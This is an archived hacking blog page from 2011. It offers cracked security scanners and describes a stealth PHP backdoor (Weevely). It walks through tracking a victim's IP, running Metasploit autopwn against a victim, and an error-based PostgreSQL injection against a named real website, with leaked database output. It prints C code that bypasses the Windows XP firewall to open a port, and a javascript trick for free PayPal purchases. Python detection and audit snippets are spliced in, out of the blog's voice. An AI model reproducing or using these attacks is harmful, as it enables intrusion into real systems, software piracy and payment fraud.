Home » Archives for June 2011
Acunetix Ver 7.0 Cracked Working and UPDATEABLE
But only use it in VMware because I am not 100% sure if it is clean ...
Thanks...

Pangolin Professional working Tested
Also, please use it only in VMware because I am not sure if it is 100% clean.

RCE, LFI, RFI, SQLi scanner Darkjumper v5.8
Here are some key features of "Darkjumper":
· Scan SQL injection, RFI, LFI, blind SQL injection
· Autosql injector
· Proxy support
· Verbosity
· Autoftp bruteforcer
· IP or proxy checker and GeoIP
Requirements:
· Python
Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

How to get IP address of another computer remotely
Hello friends, today I will explain how to get the IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer, and then you can start your further hacking into the remote system, like port scanning and finding vulnerabilities to enter the system and hack it. There are several methods to get the IP address of the victim, but I will share a few, especially the best ones, which can tell you the IP address in just a few clicks. All of them are free, and all are manual methods, which means you do not require any tool.
How to Find IP address of another computer?
- Compose your email just like you usually would in your own email or web email program
- Type: .readnotify.com on the end of your recipient's email address (don't worry, that gets removed before your recipients receive the email). Like this: [email protected].readnotify.com
- Send your email
- don't send to and from the same computer
- if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
- if you are cc-ing your email to other readers, you must add tracking to all of them
Now you have the IP address, but what can you do with an IP address? Ahhaah, everything; that I will explain in my next article.

[Video Tut]Local Password Cracking[Noob Friendly]

Local Password Cracking

[Video tut] Triple Boot! [Noob Friendly]


Hacking with Nmap and Metasploit
Today I am writing a tutorial on hacking with Nmap and Metasploit.
First download Metasploit 3.3 from the official website. Link:
http://www.metasploit.com/
Let all that install; towards the end of the installation it will ask if you would like Nmap installed as well. Choose yes. Once you have that installed, the Metasploit screen will open up as shown below...
Now type db_create
Once you have typed that, type nmap
This loads nmap, as shown below....
You need to configure your scan now. I usually do a simple -sT -sV scan, which will tell us the open ports and services running on the victim's computer. Now type nmap -sT -sV xxx.xxx.xxx.x (the x's being the victim's IP number), as demonstrated below.
Now give it 5 minutes to complete the scan. Once that is complete, if you're lucky you should get a response like this...
This is basically a list of the open ports and services running on the target machine. The handy feature of the Metasploit 3.3 framework is the autopwn feature: it searches for and runs all matching exploits in the Metasploit database against the target machine and, if successful, will create a shell or similar privilege for the attacker.
Once you have the nmap results delivered back to you showing the open ports and services, type db_autopwn -p -t -e. From this point you will either have access to the victim's computer through a successfully launched exploit, or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately, on this particular machine I found it wasn't vulnerable, as the image below proves. Good luck.

How To Combine Your Files Into Any Section [Video Tutorial]
OK dude, I posted a video tutorial on how to combine your files into any file extension!
Downloads :

A Stealth Tiny PHP Backdoor! weevely
- Coded requests: Communication between the backdoor server and the client is done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log file review.
- PHP security bypass: The program tries to bypass PHP configurations that disable sensitive functions that execute external programs, set with the disable_functions option in php.ini. Weevely tries different system functions (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use the functions enabled on the remote server.
- Tiny server: The backdoor server code is small and easily hidden in other PHP files. The core is dynamically encrypted, aiming to bypass pattern-matching controls.
- Modularity: It is simple to extend the backdoor server's features with modules, injecting PHP code through the backdoor to implement new functionality on the remote server. Coding and loading new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path.
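On the defensive side, the function fallback in the Weevely description above only works when php.ini blocks some execution functions and not others. The following is an added example, not part of the original post or of Weevely: it reads a php.ini text and reports which of the listed execution functions are still callable. The sample ini texts are constructed, and the two extension-provided entries (perl->system(), python_eval()) are left out.

```python
import re

# Program-execution functions named in the description above.
EXEC_FUNCTIONS = ["system", "passthru", "popen", "exec",
                  "proc_open", "shell_exec", "pcntl_exec"]

def disabled_functions(ini_text):
    """Return the set named by the last disable_functions directive."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a php.ini comment
        m = re.match(r"(?i)disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip("\"'")
            # PHP function names are case-insensitive, so compare in lower case.
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled

def still_callable(ini_text):
    """List the execution functions that the configuration does not block."""
    off = disabled_functions(ini_text)
    return [f for f in EXEC_FUNCTIONS if f not in off]

# Constructed sample: a partial deny list that leaves fallbacks available.
WEAK_INI = """\
; constructed sample
disable_functions = system, exec
"""

# Constructed sample: every listed execution function is blocked.
HARDENED_INI = """\
disable_functions = "system,passthru,popen,exec,proc_open,shell_exec,pcntl_exec"
"""

if __name__ == "__main__":
    print("weak:    ", still_callable(WEAK_INI))
    print("hardened:", still_callable(HARDENED_INI))
```

disable_functions is a deny list, so it only helps when every execution function is covered; blocking system() and exec() alone leaves the remaining fallbacks open.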

Postgre Error based sqli Tutorial
money, and dates.
Let's start to play with PostgreSQL:
1st Step find the vulnerability:
http://www.creatop.com.cn/index.cfm?MenuID=80'
ERROR: syntax error at or near "''"
This means the website can be injected. Remember that errors can vary; you won't get the same error every time.
2nd Step Columns count:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--
get valid page
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--
Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.
Lets try UNION SELECT query:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--
Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched
It seems the UNION SELECT query is not working!
Let's try error-based PostgreSQL SQLi…
3rd Step:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--
ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
As we can see, we got the version of the PostgreSQL DB server in the form of an error.
Let's move on and find the database name.
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "scoutsqld"
scoutsqld is the first database name; you can vary the offset to get the other database names :)
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is the second database, so you can increase the offset until you get an error.
Lets find out the user:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "postgres"
postgres is the user :)
Lets find the tables :>
4th step:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "pg_type"
pg_type is the first table; we can get the others by changing the offset :)
5th step:
Now we have to find the columns of our specific table!
E.g. our table is action.
For that we have to use Oracle char conversion:
pg_type = CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)
So our query is:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
You can find further columns using the offset.
Last step:
Now we have to extract data from our column.
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"
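The requests in this walkthrough leave a recognisable trail in web server logs. The sketch below is an added example, not code from the original post: it flags those request shapes in access-log lines, assuming MenuID should only ever be a plain integer. The log lines, the 192.0.2.x addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request shapes from the walkthrough above, as case-insensitive signatures.
SIGNATURES = [
    ("quote-probe", re.compile(r"^\d+'+$")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("cast-error-leak", re.compile(r"\bcast\s*\(.+\bas\s+int", re.I | re.S)),
    ("catalog-enum", re.compile(r"\bpg_\w+|\binformation_schema\.", re.I)),
    ("chr-concat", re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\|\|", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(value):
    """Return signature names matched by a parameter that should be an integer."""
    if re.fullmatch(r"\d{1,9}", value):
        return []
    hits = [name for name, rx in SIGNATURES if rx.search(value)]
    return hits or ["non-integer"]

def scan(lines, param="MenuID"):
    """Return (client, status, hits) for each request whose param is not an integer."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if key.lower() == param.lower():
                hits = classify(value)
                if hits:
                    findings.append((client, status, hits))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2011:10:00:00 +0000] "GET /index.cfm?MenuID=80 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jun/2011:10:01:00 +0000] "GET /index.cfm?MenuID=80%27 HTTP/1.1" 500 812',
    '192.0.2.66 - - [01/Jun/2011:10:01:09 +0000] "GET /index.cfm?MenuID=80%20order%20by%202-- HTTP/1.1" 500 840',
    '192.0.2.66 - - [01/Jun/2011:10:01:30 +0000] "GET /index.cfm?MenuID=80%20and%201=cast((select%20datname%20from%20pg_database%20limit%201%20offset%200)%20as%20int)-- HTTP/1.1" 500 901',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Every flagged request in the sample also returned HTTP 500, which is how the verbose database error reached the client. Binding MenuID as an integer query parameter and returning a generic error page removes both the injection and the leak.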

[Video tut]Sqli injection Details Tutorial [Noob Friendly]

Download

[Vid Tut]DVD BackTrack 4 Fully Professional Training Tutorial [ Noob Friendly]
Download :
http://www.filesonic.com/file/1160797501
http://www.filesonic.com/file/1160817281
http://www.filesonic.com/file/1160822361
http://www.filesonic.com/file/1160822351
http://www.filesonic.com/file/1160797461
http://www.filesonic.com/file/1160778361
http://www.filesonic.com/file/1160797481
http://www.filesonic.com/file/1160778351

[Video Tut] Basics of Trojans

Download link: http://www.filesonic.com/folder/6382471

[Video Tut] WEP Cracking

Download:

[Video Tutorial] Detailed Tutorial How To Hack Website With XSS


How does antivirus software work or detect viruses
Dictionary based continuous and fragmented string Search:
Suspicious activity detection:

How to Bypass Windows XP Firewall
This technique is nothing but a vulnerability found in the Windows XP SP2 firewall.
Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a firewall. Direct access to the firewall's registry keys allows local attackers to bypass the firewall's blocking list and allows a malicious program to connect to the network.
* Microsoft Windows XP SP2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Source Code :-
#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello Pakistan\r\n");
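/* leave room for the terminator and handle a failed recv() */
temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
if (temp < 0)
temp = 0;
buffer[temp] = '\0';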
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
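A defender can review this key for entries that do not belong. The following is an added example, not part of the original post: it parses the path:scope:state:name value format shown above and flags enabled entries that are missing from a baseline or sit outside expected program directories. The sample values, the baseline and the trusted-directory list are constructed assumptions.

```python
# Directories where allowed programs are expected (assumption; tune per site).
TRUSTED_PREFIXES = ("%windir%\\", "c:\\windows\\", "c:\\program files\\")

def parse_entry(data):
    """Split 'path:scope:Enabled|Disabled:name' from the right, because the
    path itself contains ':' after the drive letter.
    Assumes the scope field holds no ':' of its own."""
    parts = data.rsplit(":", 3)
    if len(parts) != 4:
        raise ValueError("unexpected entry format: %r" % (data,))
    path, scope, state, name = parts
    return {"path": path, "scope": scope,
            "enabled": state.lower() == "enabled", "name": name}

def audit(values, baseline=()):
    """Return {value_name: [reasons]} for enabled entries that need review."""
    known = {p.lower() for p in baseline}
    findings = {}
    for value_name, data in values.items():
        entry = parse_entry(data)
        if not entry["enabled"]:
            continue
        path = entry["path"].lower()
        reasons = []
        if path not in known:
            reasons.append("not in baseline")
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append("outside trusted directories")
        if reasons and entry["scope"] == "*":
            reasons.append("open to any source address")
        if reasons:
            findings[value_name] = reasons
    return findings

# Constructed name/data pairs as they would sit under AuthorizedApplications\List.
SAMPLE_VALUES = {
    r"%windir%\system32\sessmgr.exe":
        r"%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019",
    r"C:\chat.exe": r"C:\chat.exe:*:Enabled:chat",
    r"C:\Program Files\Tool\tool.exe":
        r"C:\Program Files\Tool\tool.exe:LocalSubNet:Enabled:Tool",
}
BASELINE = [r"%windir%\system32\sessmgr.exe"]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_VALUES, BASELINE).items():
        print(name, "->", ", ".join(reasons))
```

The sample program above deletes its own value again once it is listening, so a one-off snapshot can miss it; auditing writes to the key, or restricting write access to it, covers that gap.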

All Hacking Tutorials By Mr.Mindfreak
Folder link:
http://www.fileserve.com/list/qKUBhap
Free Paypal "buy now" [Exploit]
http://livewebbanners.com/learn.shtml
or
http://www.tallentagency.com/YouTubeClone/index.htm
How to use it:
Copy the code (below)
Go to the page that you're doing it on
Paste the code you copied into the URL bar and it should start.
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);
Hope this really helps you and you save a bit of $ $
Another tip:
To find these sites, Google - "this order button requires a javascript enabled browser"
Type that in the "quotes" into Google.

BT4 Assuring Security by Penetration Testing
If you are working in the “information security” field, you must know the BackTrack distribution (otherwise you must be an alien coming from a faraway planet!). If you search for the word “backtrack” on Amazon, you will find a lot of references but only one book is fully dedicated to the Linux distribution: “BackTrack 4: Assuring Security by Penetration Testing”. I received a copy directly from the publisher and here is my review.
- Target scoping
- Information gathering
- Target discovery
- Enumerating target
- Vulnerability mapping
- Social engineering
- Target exploitation
- Privilege escalation
- Maintaining access
- Documentation and reporting
So, who needs this book? The author’s goal is certainly not to give recipes on “how to hack a website”. The book must be seen as a reference for those who already know the BackTrack distribution or who want to learn it. Don’t forget: this is just a toolbox, it does not prevent you from using your brain!
More information about the book here.
Regards
Adnan Anjum.

Make Your Computer Login Screen Like FBI Tunnel
Information:
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.
